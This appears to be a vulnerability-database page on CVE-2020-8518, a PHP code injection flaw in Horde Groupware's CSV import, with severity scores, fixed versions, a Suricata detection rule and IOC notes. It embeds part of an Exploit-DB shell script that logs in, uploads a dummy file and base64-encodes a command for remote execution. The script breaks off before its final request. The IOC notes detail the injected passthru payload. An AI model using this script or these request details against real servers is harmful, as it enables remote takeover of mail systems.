CVE-2020-8518
published 2020-02-17CVE-2020-8518: Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.
PriorityP182critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
71.14%
99.3th percentile
Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | php-horde-data | < php-horde-data 2.1.5-1 (bookworm) | php-horde-data 2.1.5-1 (bookworm) |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| horde | groupware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Possible CVE-2020-8518 (Horde Groupware RCE)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"data.php"; endswith; http.request_body; content:"|22 3b 20|filename=|22|"; content:"|2e|passthru|28|"; content:"|2e|die|28 29 3b|"; distance:0; http.header_names; content:"horde_secret_key|0d 0a|"; nocase; fast_pattern; reference:url,cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/; reference:cve,2020-8518; classtype:attempted-admin; sid:2029636; rev:3; metadata:attack_target Web_Server, created_at 2020_03_13, cve CVE_2020_8518, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_11_07;)
- →Exploit sends a POST to /mnemo/data.php with actionID=11 and import_format=csv to upload a dummy file, followed by a second POST with actionID=3, import_step=2, and a crafted 'quote' parameter containing injected PHP (passthru/base64_decode/die) to trigger RCE. ↗
- →The injected PHP payload is base64-encoded and passed via the 'quote' POST parameter; look for base64-encoded strings in the 'quote' field of CSV import requests to /mnemo/data.php. ↗
- →The exploit requires prior authentication; monitor for login attempts to /login.php with horde_user/horde_pass POST parameters followed immediately by requests to /mnemo/data.php. ↗
- →The Emergingthreats Snort/Suricata rule (SID 2029636) detects this exploit by matching POST to a URI ending in data.php, with request body containing the byte sequences for '; filename="', '.passthru(', and '.die();', plus the horde_secret_key header.
- →The two-stage attack first uploads a dummy file (actionID=11, import_step=1) to establish a session context, then injects PHP in the second request (actionID=3, import_step=2); both stages should be correlated for high-confidence detection. ↗
- ·The vulnerability is present in Horde_Data module version 2.1.4 and earlier; the fix is in version 2.1.5. Debian packages resolved this in version 2.1.5-1 across bookworm, bullseye, and sid. ↗
- ·Exploitation requires valid credentials; unauthenticated attackers cannot directly exploit this vulnerability. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vendor_debian9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v54x-qq77-866f: Horde Groupware Webmail Edition 5
ghsa_unreviewed·2022-05-24
CVE-2020-8518 [HIGH] CWE-94 GHSA-v54x-qq77-866f: Horde Groupware Webmail Edition 5
Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.
OSV
CVE-2020-8518: Horde Groupware Webmail Edition 5
osv·2020-02-17·CVSS 9.8
CVE-2020-8518 [CRITICAL] CVE-2020-8518: Horde Groupware Webmail Edition 5
Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.
Debian
CVE-2020-8518: php-horde-data - Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code vi...
vendor_debian·2020·CVSS 9.8
CVE-2020-8518 [CRITICAL] CVE-2020-8518: php-horde-data - Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code vi...
Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.
Scope: local
bookworm: resolved (fixed in 2.1.5-1)
bullseye: resolved (fixed in 2.1.5-1)
sid: resolved (fixed in 2.1.5-1)
Suricata
ET WEB_SPECIFIC_APPS Possible CVE-2020-8518 (Horde Groupware RCE)
suricata·2020-03-13·CVSS 9.8
CVE-2020-8518 [CRITICAL] ET WEB_SPECIFIC_APPS Possible CVE-2020-8518 (Horde Groupware RCE)
ET WEB_SPECIFIC_APPS Possible CVE-2020-8518 (Horde Groupware RCE)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Possible CVE-2020-8518 (Horde Groupware RCE)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"data.php"; endswith; http.request_body; content:"|22 3b 20|filename=|22|"; content:"|2e|passthru|28|"; content:"|2e|die|28 29 3b|"; distance:0; http.header_names; content:"horde_secret_key|0d 0a|"; nocase; fast_pattern; reference:url,cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/; reference:cve,2020-8518; classtype:attempted-admin; sid:2029636; rev:3; metadata:attack_target Web_Server, created_at 2020_03_13, cve CVE_2020_8518, deployment Perimeter, performance_impact Low, conf
Exploit-DB
Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution
exploitdb·2020-03-10
CVE-2020-8518 Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution
Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution
---
#!/bin/sh
if [ "$#" -ne 4 ]; then
echo '[!] Usage: ' 1>&2
exit 1
fi
BASE="$1"
USERNAME="$2"
PASSWORD="$3"
COMMAND="$4"
JAR="$(mktemp)"
trap 'rm -f "$JAR"' EXIT
echo "[+] Logging in as $USERNAME:$PASSWORD" 1>&2
curl -si -c "$JAR" "$BASE/login.php" \
-d 'login_post=1' \
-d "horde_user=$USERNAME" \
-d "horde_pass=$PASSWORD" | grep -q 'Location: /services/portal/' || \
echo '[!] Cannot log in' 1>&2
echo "[+] Uploading dummy file" 1>&2
echo x | curl -si -b "$JAR" "$BASE/mnemo/data.php" \
-F 'actionID=11' \
-F 'import_step=1' \
-F 'import_format=csv' \
-F 'notepad_target=x' \
-F 'import_file=@-;filename=x' \
-so /dev/null
echo "[+] Running command" 1>&2
BASE64_COMMAND="$(echo -n "$COMMAND 2>&1" | base64 -w0)"
curl -b "$JA
Metasploit
Horde CSV import arbitrary PHP code execution
metasploit
Horde CSV import arbitrary PHP code execution
Horde CSV import arbitrary PHP code execution
The Horde_Data module version 2.1.4 (and before) present in Horde Groupware version 5.2.22 allows authenticated users to inject arbitrary PHP code thus achieving RCE on the server hosting the web application.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/156872/Horde-5.2.22-CSV-Import-Code-Execution.htmlhttps://lists.debian.org/debian-lts-announce/2020/04/msg00008.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2PRPIFQDGYPQ3F2TF2ETPIL7IYNSVVZQ/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DKTNYDBDVJNMVC7QPXQI7CMPLX3USZ2T/https://lists.horde.org/archives/announce/2020/001285.htmlhttp://packetstormsecurity.com/files/156872/Horde-5.2.22-CSV-Import-Code-Execution.htmlhttps://lists.debian.org/debian-lts-announce/2020/04/msg00008.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2PRPIFQDGYPQ3F2TF2ETPIL7IYNSVVZQ/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DKTNYDBDVJNMVC7QPXQI7CMPLX3USZ2T/https://lists.horde.org/archives/announce/2020/001285.html
2020-02-17
Published